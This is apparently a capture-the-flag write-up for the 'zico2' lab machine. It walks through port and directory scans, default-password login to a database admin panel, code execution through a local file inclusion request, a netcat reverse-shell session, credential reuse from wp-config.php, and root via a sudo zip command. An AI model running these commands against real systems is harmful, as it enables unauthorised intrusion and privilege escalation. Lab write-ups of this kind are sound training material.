Machine Information
- zico2
- Author:
Rafael
Host discovery
- target IP:
10.10.10.133
Information Gathering
Nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
nmap -p- -T4 10.10.10.133 -A -oA 10.10.10.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 14:20 +08
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:10 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.82% done; ETC: 14:20 (0:00:04 remaining)
Nmap scan report for 10.10.10.133
Host is up (0.00078s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37548/udp status
| 100024 1 41180/udp6 status
| 100024 1 45184/tcp6 status
|_ 100024 1 49982/tcp status
49982/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:6C:3F:67 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms 10.10.10.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds
Exploiting Port 80
I started out by wandering around the website first.
The website looks like there’s nothing much that I could work on. Lets try directory searching.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.133/ -x php,js,txt,bak,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.133/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,bak,zip,php,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 284]
/.hta.php (Status: 403) [Size: 288]
/.hta.js (Status: 403) [Size: 287]
/.hta.bak (Status: 403) [Size: 288]
/.hta.zip (Status: 403) [Size: 288]
/.hta.txt (Status: 403) [Size: 288]
/.htaccess.zip (Status: 403) [Size: 293]
/.htaccess (Status: 403) [Size: 289]
/.htaccess.js (Status: 403) [Size: 292]
/.htaccess.txt (Status: 403) [Size: 293]
/.htpasswd (Status: 403) [Size: 289]
/.htpasswd.bak (Status: 403) [Size: 293]
/.htpasswd.txt (Status: 403) [Size: 293]
/.htaccess.php (Status: 403) [Size: 293]
/.htpasswd.zip (Status: 403) [Size: 293]
/.htaccess.bak (Status: 403) [Size: 293]
/.htpasswd.php (Status: 403) [Size: 293]
/.htpasswd.js (Status: 403) [Size: 292]
/cgi-bin/ (Status: 403) [Size: 288]
/css (Status: 301) [Size: 310] [--> http://10.10.10.133/css/]
/dbadmin (Status: 301) [Size: 314] [--> http://10.10.10.133/dbadmin/]
/img (Status: 301) [Size: 310] [--> http://10.10.10.133/img/]
/index (Status: 200) [Size: 7970]
/index.html (Status: 200) [Size: 7970]
/js (Status: 301) [Size: 309] [--> http://10.10.10.133/js/]
/LICENSE (Status: 200) [Size: 1094]
/package (Status: 200) [Size: 789]
/server-status (Status: 403) [Size: 293]
/tools (Status: 200) [Size: 8355]
/vendor (Status: 301) [Size: 313] [--> http://10.10.10.133/vendor/]
/view.php (Status: 200) [Size: 0]
/view (Status: 200) [Size: 0]
There’s some interesting directories. I then look into it one by one .
I found a login page in /dbadmin/test_db.php. Since the version number is provided, I tried to look into it and see if there’s any exploits as well as default password. After searching in google, I found this exploit which provide a details information of the exploits as well as a default password which is admin.
By using the default password, I managed to login into the admin panel. Now I could just follow the exploit and get a RCE. The first thing to do is create a new database with the extension of php.
Next, Create a table with any info and insert the php code in default value.
Now the php file should be created but I will still need to execute it. After looking into the main page again, I noticed that it has a link which redirects me into a new link.
Based on the link, it looks like it should be vulnerable to LFI. I then tried to look for /etc/passwd
By doing that, I could try to search for the php code that I created just now.
1
2
curl 'http://10.10.10.133/view.php?page=../../../../../../../usr/databases/test.php&0=id' --output -
��yQ�table11CREATE TABLE '1' ('test' TEXT default 'uid=33(www-data) gid=33(www-data) groups=33(www-data)
After I managed to get RCE. With that, I could just get a reverse shell.
1
2
3
4
5
6
7
8
9
10
11
nc -nvlp 7735
listening on [any] 7735 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.133] 59963
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@zico:/var/www$ export TERM=xterm
export TERM=xterm
www-data@zico:/var/www$ ^Z
zsh: suspended nc -nvlp 7735
Privilege Escalation
Now that I have shell, its time for privilege escalation. Looks for home directory first.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@zico:/home/zico$ ls -la
total 9244
drwxr-xr-x 6 zico zico 4096 Jun 19 2017 .
drwxr-xr-x 3 root root 4096 Jun 8 2017 ..
-rw------- 1 zico zico 912 Jun 19 2017 .bash_history
-rw-r--r-- 1 zico zico 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 zico zico 3486 Jun 8 2017 .bashrc
-rw-r--r-- 1 zico zico 675 Jun 8 2017 .profile
drw------- 2 zico zico 4096 Jun 8 2017 .ssh
-rw------- 1 zico zico 3509 Jun 19 2017 .viminfo
-rw-rw-r-- 1 zico zico 504646 Jun 14 2017 bootstrap.zip
drwxrwxr-x 18 zico zico 4096 Jun 19 2017 joomla
drwxrwxr-x 6 zico zico 4096 Aug 19 2016 startbootstrap-business-casual-gh-pages
-rw-rw-r-- 1 zico zico 61 Jun 19 2017 to_do.txt
drwxr-xr-x 5 zico zico 4096 Jun 19 2017 wordpress
-rw-rw-r-- 1 zico zico 8901913 Jun 19 2017 wordpress-4.8.zip
-rw-rw-r-- 1 zico zico 1194 Jun 8 2017 zico-history.tar.gz
Since there’s a zico-history.tar.gz, let me unzip and look and see.
1
2
3
4
5
6
7
8
www-data@zico:/tmp/zico-history$ cat zico-history.txt
https://en.wikipedia.org/wiki/Zico
Arthur Antunes Coimbra, born 3 March 1953 in Rio de Janeiro), better know Zico, is a Brazilian coach and former footballer, who played as an attacking midfielder. Often called the "White Pelé", he was a creative playmaker, with excellent technical skills, vision, and en eye for goal, who is considered one of the most clinical finishers and best passers ever, as well as one of the greatest players of all time.[2][3][4] Arguably the world's best player of the late 1970s and early 80s, he is regarded as one of the best playmakers and free kick specialists in history, able to bend the ball in all directions.[5] In 1999, Zico came eighth in the FIFA Player of the Century grand jury vote, and in 2004 was named in the FIFA 100 list of the world's greatest living players.[6][7] According to Pelé, generally considered the best player ever, "throughout the years, the one player that came closest to me was Zico".[8]
With 48 goals in 71 official appearances for Brazil, Zico is fifth highest goalscorer for his national team.[9] He represented them in the 1978, 1982 and 1986 World Cups. They did not win any of those tournaments, even though the 1982 squad is considered one of the greatest Brazilian national squads ever.[10] Zico is often considered one of the best players in football history not to have been on a World Cup winning squad. He was chosen 1981[11] and 1983 Player of the Year.
Zico has coached the Japanese national team, appearing in the 2006 FIFA World Cup and winning the Asian Cup 2004, and Fenerbahçe, who were a quarter-finalist in 200 in the Champions League under his command. He was announced as the head coach of CSKA Moscow in January 2009. On 16 September 2009, Zico was signed by Greek side Olympiacos for a two-year contract after the club's previous coach, Temuri Ketsbaia, was sacked. He was fired four months later, on 19 January 2010.[
Nothing special so I moved to the next place. I then looked into the home directory again and search for useful files such as config.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
www-data@zico:/home/zico$ find . -name "*config*" 2>/dev/null
./wordpress/wp-config.php
./wordpress/wp-content/plugins/akismet/views/config.php
./wordpress/wp-admin/setup-config.php
./joomla/components/com_config
./joomla/components/com_config/config.php
./joomla/components/com_config/view/config
./joomla/components/com_config/controller/config
./joomla/components/com_config/model/config.php
./joomla/components/com_config/model/form/config.xml
./joomla/language/en-GB/en-GB.com_config.ini
./joomla/administrator/components/com_config
./joomla/administrator/components/com_config/config.php
./joomla/administrator/components/com_config/config.xml
./joomla/administrator/components/com_config/helper/config.php
./joomla/administrator/components/com_redirect/config.xml
./joomla/administrator/components/com_media/config.xml
./joomla/administrator/components/com_newsfeeds/config.xml
./joomla/administrator/components/com_admin/views/sysinfo/tmpl/default_config.php
./joomla/administrator/components/com_templates/config.xml
./joomla/administrator/components/com_contact/config.xml
./joomla/administrator/components/com_installer/config.xml
./joomla/administrator/components/com_joomlaupdate/config.xml
./joomla/administrator/components/com_checkin/config.xml
./joomla/administrator/components/com_tags/config.xml
./joomla/administrator/components/com_plugins/config.xml
./joomla/administrator/components/com_modules/config.xml
./joomla/administrator/components/com_postinstall/config.xml
./joomla/administrator/components/com_finder/config.xml
./joomla/administrator/components/com_menus/config.xml
./joomla/administrator/components/com_content/config.xml
./joomla/administrator/components/com_banners/config.xml
./joomla/administrator/components/com_users/config.xml
./joomla/administrator/components/com_cache/config.xml
./joomla/administrator/components/com_messages/views/config
./joomla/administrator/components/com_messages/config.xml
./joomla/administrator/components/com_messages/controllers/config.php
./joomla/administrator/components/com_messages/models/config.php
./joomla/administrator/components/com_messages/models/forms/config.xml
./joomla/administrator/components/com_search/config.xml
./joomla/administrator/components/com_languages/config.xml
./joomla/administrator/language/en-GB/en-GB.com_config.sys.ini
./joomla/administrator/language/en-GB/en-GB.com_config.ini
./joomla/administrator/templates/hathor/html/com_config
./joomla/administrator/templates/hathor/html/com_admin/sysinfo/default_config.php
./joomla/administrator/templates/hathor/images/header/icon-48-config.png
./joomla/administrator/templates/hathor/images/menu/icon-16-config.png
./joomla/administrator/templates/hathor/images/toolbar/icon-32-config.png
./joomla/installation/configuration.php-dist
./joomla/installation/controller/install/config.php
./joomla/installation/model/configuration.php
./joomla/web.config.txt
./joomla/libraries/cms/component/router/viewconfiguration.php
./joomla/libraries/fof/utils/config
./joomla/libraries/fof/config
There’s a lot of config files. I then look one by one for any useful creds.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
www-data@zico:/home/zico/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');
/** MySQL database username */
define('DB_USER', 'zico');
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
I managed to found a username and password. I then tried to escalate to use zico with the password and it works!
1
2
3
4
www-data@zico:/home/zico/wordpress$ su zico
Password:
zico@zico:~/wordpress$ whoami
zico
Now that I have credentials, let me try sudo privileges.
1
2
3
4
5
6
7
8
zico@zico:~/wordpress$ sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
There are some sudo privileges! Time to search for GTFObin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
zico@zico:~/wordpress$ TF=$(mktemp -u)
zico@zico:~/wordpress$ sudo zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 35%)
# whoami
root
root@zico:/root# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#
By using the exact command in GTFObin, I managed to get root account.
Things I learned from the machine
- weird initial foothold
- WEAK PASSWORD OP